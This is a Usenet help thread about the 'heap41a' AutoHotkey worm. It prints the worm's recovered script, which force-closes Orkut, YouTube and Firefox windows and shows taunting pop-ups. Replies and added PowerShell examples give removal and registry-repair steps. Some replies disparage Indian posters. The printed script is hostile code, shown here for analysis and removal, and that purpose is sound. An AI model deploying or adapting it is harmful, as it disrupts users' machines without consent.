when I came home. My system was ON; I never noticed that before, since I
had given a command to shut down @ 10:30 in the morning.. ok.. ok
Lemme tell you how to remove that bug (here, malware)
when you get that message.
1. Go to the Task Manager
2. Click on the "Application" tab (if it's not)
3. Right-click on the application that's giving you the message > go
to the process.
4. As you can see, there is "svchost.exe" highlighted.
5. Right-click and select "End Process Tree"
Well, this is for the beginners. :)
If you really wanna get rid of the malware,
here is the deal..
There is a file called
"heap41a"
which is located in C:\heap41a.
This is the script which I got when I checked the file.
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA
BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}
return
I notice that there are two websites which are being blocked...
1. Orkut
2. youtube
Also I notice that there is a .mp3 file which lets the sound be
played @ the end of the display.
Well.. whoever the person is who has written this TCR, it's good for me since I
got some sound to scare small children :D..
Hmmm, what are you waiting for, guys, del that folder C:\heap41a
If you want to know more...
mail to ravi...@gmail.com
These days I'm busy since I have exams running in my head. :) If
possible I'll tell you more.
bye..
> hmmm what are you waiting for Guys, del that Folder C:\heap41a
I don't have one to delete. Crap like that doesn't get on to my system
in the first place. You need to look at how it *could* get on to yours.
______
Dennis
--
guru, n: A computer owner who can read the manual.
reg
yep, another google grouper out of India - seems a few here still take
these nitwits seriously...
thnkx a lot dude..
gr8 help!!!!
<snip troll tripe>
zoolook - getting a hint yet?
Indian google grouper from a spam infested network this time - kill file
is starting to read like the Ramayana....
It is crap like this that makes me want to kill file gmail, yahoo, and
hotmail posting morons.
Know where you're coming from but can't paint them /all/ with the same
brush. The problem with google /groupers/ is that they don't
understand/even know about usenet or its implementation. That said, I'm
in fact leaning toward something else more along the lines of a troll in
the above post - it seems possible that all the posts were written by
the same person, or maybe they all had the same English teacher?
Thanks goodwin, I know there are some people who use gmail and yahoo
and hotmail and are good people but they are far and few between
and I get a little frustrated with it
> Thanks goodwin, I know there are some people who use gmail and yahoo and
> hotmail and are good people but they are far and few between and I get a
> little frustrated with it.
Heck, even *I* don't kill (or even downscore) gmail/yahoo/hotmail users,
and I think you know from other newsgroups that I'm pretty hardcore about
Google Gropers. :)
--
Blinky RLU 297263
Killing all posts from Google Groups
The Usenet Improvement Project: http://blinkynet.net/comp/uip5.html
You did a big thing dude
> mail to ravi.w...@gmail.com
Hey blinky how are ya, just how many groups are you in<G>
and like I have said, if a gmailer, yahoo, and hotmailer
are not trolls I leave them alone
> Blinky the Shark <no....@box.invalid> wrote in
>>
>> Heck, even *I* don't kill (or even downscore) gmail/yahoo/hotmail users,
>> and I think you know from other newsgroups that I'm pretty hardcore
>> about Google Gropers. :)
>>
>>
>>
> Hey blinky how are ya, just how many groups are you in<G>
Enough that I can keep an eye on you. ;)
I was almost about to format my system until I found your blog.
The virus writer has also disabled the option of viewing the hidden
files and folders and so I was not able to see this folder
c:\heap41a.
One more important thing to do is to open the registry and set the
option "HKEY_LOCAL_MACHINE->software->microsoft->windows->current
version->explorer->advanced->folder->hidden->showall->CheckedValue" to
1 instead of the 0 which you are seeing. If you do not do this, you
won't be able to see hidden folders.
Check out the orkut, firefox, youtube all in one solution here
http://meninweb.blogspot.com/2007/05/i-dnt-hate-mozilla-but-use-ie-or-else.html
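The registry value named in the post above can be inspected and restored from an elevated PowerShell prompt. This is an added example, not part of the original thread: the key path is the standard spelling of the one quoted above, the function names are made up for illustration, and recreating the value as a DWORD is a precaution for the case where its type was changed along with its data.

```powershell
# Added example (not from the thread). Run elevated: HKLM is read-only otherwise.
$Key  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$Name = 'CheckedValue'

function Get-ShowAllState {
    # Report whether the value exists, its data, and its registry type.
    $k = Get-Item -LiteralPath $Key -ErrorAction SilentlyContinue
    if ($null -eq $k -or $k.GetValueNames() -notcontains $Name) {
        return [pscustomobject]@{ Present = $false; Data = $null; Kind = $null; Healthy = $false }
    }
    $data = $k.GetValue($Name)
    $kind = $k.GetValueKind($Name)
    [pscustomobject]@{
        Present = $true
        Data    = $data
        Kind    = $kind
        # Healthy means: a DWORD holding 1, so "Show hidden files" in Explorer works.
        Healthy = ($kind -eq [Microsoft.Win32.RegistryValueKind]::DWord -and $data -eq 1)
    }
}

function Repair-ShowAll {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $state = Get-ShowAllState
    if ($state.Healthy) { return $state }
    if ($PSCmdlet.ShouldProcess("$Key\$Name", 'Set to DWORD 1')) {
        if (-not (Test-Path -LiteralPath $Key)) { New-Item -Path $Key -Force | Out-Null }
        # Remove first so a value with the wrong type is replaced, not just overwritten.
        if ($state.Present) { Remove-ItemProperty -LiteralPath $Key -Name $Name }
        New-ItemProperty -LiteralPath $Key -Name $Name -PropertyType DWord -Value 1 | Out-Null
    }
    Get-ShowAllState
}

Get-ShowAllState          # inspect only
# Repair-ShowAll -WhatIf  # preview the change
# Repair-ShowAll          # apply it
```

Explorer reads this value when the Folder Options dialog is opened, so reopen the dialog after the repair and select the option to show hidden files again.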
Hai... One more problem because of that worm....
The hidden files are not displayed....
How to solve that issue..
Hi, I am ravi here. Actually I also got the same msg when I am going to type
orkut in run command OR address bar OR if I am pinging from system then
I am getting this error. After seeing ur answer I am searching for that
folder (C:\heap41a) but I am not getting that folder in my system. If u
know any other solutions then let me know...
Thanks & Regards
Ravikumar.p
http://www.freewebs.com/mgsujith/worm/remove.html
On May 8, 7:06 pm, RAVIN <ravi.w...@gmail.com> wrote:
> mail to ravi.w...@gmail.com
thanks and regards.
swapan kumar
Could you please explain your problem more clearly.
Subject line is to give a summary of your post. There is no point in
using it to convey part of the message.
--
Vicks
Could you give some example what you want? which site you want to be
blocked?
I mean, if you are not talking about blocking some profile/ community of
Orkut, you should have posted in a new thread.
--
Vicks
For Windows and Linux there is the hosts file, but you have to put in a lot
of entries just to block variations of doubleclick.net; the advantage
is that it will block sites regardless of browser used or if you turn off
an extension. Good to have.
Blocking Unwanted Parasites with a Hosts File
http://www.mvps.org/winhelp2002/hosts.htm
You want to include all dangerous sites in your hosts file
that you are likely to encounter, and at least some of the
annoying sites you don't want to visit.
But most of my blocking in Firefox is actually accomplished with
"Adblock" extension. You can install "Adblock Plus" extension, see
https://addons.mozilla.org/en-US/firefox/addon/1865
Adding entries is easy or you can subscribe to a filter set.
You want to filter out all annoying ads, and dangerous sites.
--
David McRitchie, most questions have been asked before.
Firefox customizations/extensions notes, see
http://www.mvps.org/dmcritchie/firefox/firefox.htm
Thanks ravi;
I tried to search for the file heap41 in C: but could not find it even when
asked to show the hidden files in view menu. But I could successfully
trace it using Google Desktop search, which showed that the file heap41a
is present in C folder. For deleting, I entered MS-DOS mode and
erased the folder using
>rd C:\heap41a
which solved the problem (permanently?)
With regards
Sivaramane, N.Delhi
quoting from another thread where it was posted:
http://kb.mozillazine.org/'Use_IE'_messages_upon_opening_Firefox
--
Vicks
The full details of what is caused by this worm are available at the
following URL
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_AHKHEAP.A&VSect=T
There is more than just "heap41a" directory. Also your removable
drives (if you use any) may be infected. Clean them too to ensure it
does not make a return!!
Regds,
Nagesh
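A read-only sweep for the two artefacts this thread names, covering every mounted drive as the post above advises. This is an added example, not part of the original thread: the folder name heap41a comes from the first post, the function names are made up for illustration, and the process check relies only on the general fact that the genuine svchost.exe runs from the Windows system directories.

```powershell
# Added example (not from the thread). Read-only: it reports, it does not delete.
$FolderName = 'heap41a'   # folder name given in the first post

function Find-WormFolder {
    # Check the root of every mounted filesystem drive, removable ones included.
    # -Force lists hidden and system items even while Explorer refuses to show them.
    Get-PSDrive -PSProvider FileSystem |
        Where-Object { $_.Root -and (Test-Path -LiteralPath $_.Root) } |
        ForEach-Object {
            Get-ChildItem -LiteralPath $_.Root -Directory -Force -ErrorAction SilentlyContinue |
                Where-Object { $_.Name -ieq $FolderName } |
                Select-Object FullName, Attributes, CreationTime
        }
}

function Find-OddSvchost {
    # A process named svchost.exe whose image is not in the Windows system
    # directories is the one to look at before ending any process tree.
    $genuine = @(
        (Join-Path $env:SystemRoot 'System32\svchost.exe'),
        (Join-Path $env:SystemRoot 'SysWOW64\svchost.exe')
    )
    Get-CimInstance -ClassName Win32_Process -Filter "Name = 'svchost.exe'" |
        Where-Object { $_.ExecutablePath -and ($genuine -notcontains $_.ExecutablePath) } |
        Select-Object ProcessId, ExecutablePath, CommandLine
}

$folders   = @(Find-WormFolder)
$processes = @(Find-OddSvchost)

if ($folders.Count -eq 0)   { 'No heap41a folder at any drive root.' } else { $folders }
if ($processes.Count -eq 0) { 'No svchost.exe running from outside the system directories.' } else { $processes }
```

Run it from an elevated prompt; without elevation some processes report no executable path and are skipped by the check.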